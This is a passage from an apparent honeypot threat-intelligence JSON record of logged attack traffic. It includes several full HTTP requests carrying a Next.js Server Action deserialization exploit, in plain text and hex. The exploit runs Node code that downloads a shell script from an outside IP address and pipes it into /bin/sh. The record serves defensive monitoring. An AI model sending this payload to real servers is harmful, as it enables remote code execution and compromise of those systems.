74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:W6VG8OX+wYW3qMyuIl6gfH/39v4=","ja3":"","session":"564a1182-f167-48ad-8ed8-b70b42277051","seq":1,"duration_ms":0,"bytes_in":949,"bytes_out":79},{"timestamp":"2026-06-21T08:52:00","port":3000,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3000\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/app","summary":"","payload_hex":"504f5354202f61707020485454502f312e310d0a486f73743a20<HONEYPOT>3a333030300d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:4bqtLp0XvjoEc15y6CiVHhw/vSg=","ja3":"","session":"48c89348-96b3-4be2-88cb-c3e6ae65a5c6","seq":1,"duration_ms":0,"bytes_in":953,"bytes_out":79},{"timestamp":"2026-06-21T03:59:51","port":3001,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"connection\":\"close\",\"content-length\":\"694\",\"content-type\":\"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02\",\"host\":\"<HONEYPOT>:3001\",\"next-action\":\"x\",\"user-agent\":\"Mozilla/5.0 (rondo2012@atomicmail.io)\"}","body":"--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require('http').request({host:'45.153.34.153', port:80, path:'/rondo.aqu.sh', headers:{'User-Agent':'node'}},r=>r.pipe(process.mainModule.require('child_process').spawn('/bin/sh').stdin)).end();\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n--0fdf55df9e085737676f582ed4e95a02\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n--0fdf55df9e085737676f582ed4e95a02--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/api","summary":"","payload_hex":"504f5354202f61706920485454502f312e310d0a486f73743a20<HONEYPOT>3a333030310d0a557365722d4167656e743a204d6f7a696c6c612f352e302028726f6e646f323031324061746f6d69636d61696c2e696f290d0a436f6e6e656374696f6e3a20636c6f73650d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d4c656e6774683a203639340d0a0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a7b227468656e223a2224313a5f5f70726f746f5f5f3a7468656e222c22737461747573223a227265736f6c7665645f6d6f64656c222c22726561736f6e223a2d312c2276616c7565223a227b5c227468656e5c223a5c222442313333375c227d222c225f726573706f6e7365223a7b225f707265666978223a2270726f636573732e6d61696e4d6f64756c652e7265717569726528276874747027292e72657175657374287b686f73743a2734352e3135332e33342e313533272c20706f72743a38302c20706174683a272f726f6e646f2e6171752e7368272c20686561646572733a7b27557365722d4167656e74273a276e6f6465277d7d2c723d3e722e706970652870726f636573732e6d61696e4d6f64756c652e7265717569726528276368696c645f70726f6365737327292e737061776e28272f62696e2f736827292e737464696e29292e656e6428293b222c225f6368756e6b73223a22245132222c225f666f726d44617461223a7b22676574223a2224313a636f6e7374727563746f723a636f6e7374727563746f72227d7d7d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a22244030220d0a2d2d30666466353564663965303835373337363736663538326564346539356130320d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2232220d0a0d0a5b5d0d0a2d2d30666466353564663965303835373337363736663538326564346539356130322d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (rondo2012@atomicmail.io)","community_id":"1:gyj47nzha1rabPrx+kG1ox2M3KQ=","ja3":"","session":"7d90c8ab-58ea-41b8-9e51-7b0fdc01a7d2","seq":1,"duration_ms":0,"bytes_in":954,"bytes_out":79}],"http_methods":[{"method":"POST","count":382}],"distinct_ports_total":7,"top_paths":[{"path":"/api/runscript","count":59,"ports":1},{"path":"/","count":55,"ports":2},{"path":"/api/route","count":55,"ports":2},{"path":"/app","count":54,"ports":2},{"path":"/_next/server","count":51,"ports":2},{"path":"/_next","count":50,"ports":2},{"path":"/api","count":48,"ports":2},{"path":"/wls-wsat/CoordinatorPortType","count":7,"ports":1},{"path":"/run","count":3,"ports":1}],"distinct_paths_total":9,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Connection","Content-Length","Content-Type","Host","Next-Action","User-Agent"],"representative":[{"name":"Accept","value":"text/x-component","notable":false},{"name":"Connection","value":"close","notable":false},{"name":"Content-Length","value":"694","notable":false},{"name":"Content-Type","value":"multipart/form-data; boundary=0fdf55df9e085737676f582ed4e95a02","notable":true},{"name":"Host","value":"<HONEYPOT>:3001","notable":false},{"name":"Next-Action","value":"x","notable":false},{"name":"User-Agent","value":"Mozilla/5.0 (rondo2012@atomicmail.io)","notable":false}],"distinct_sets":1,"events_with_headers":10},"tags":[{"tag_id":"Node.js/JS Sandbox Escape RCE Attempt","tag_type":"malware","title":"Node.js/JS Sandbox Escape RCE Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"api/runscript","reference_urls":[]}],"data_as_of":"2026-06-21T12:49:22.535783+00:00"}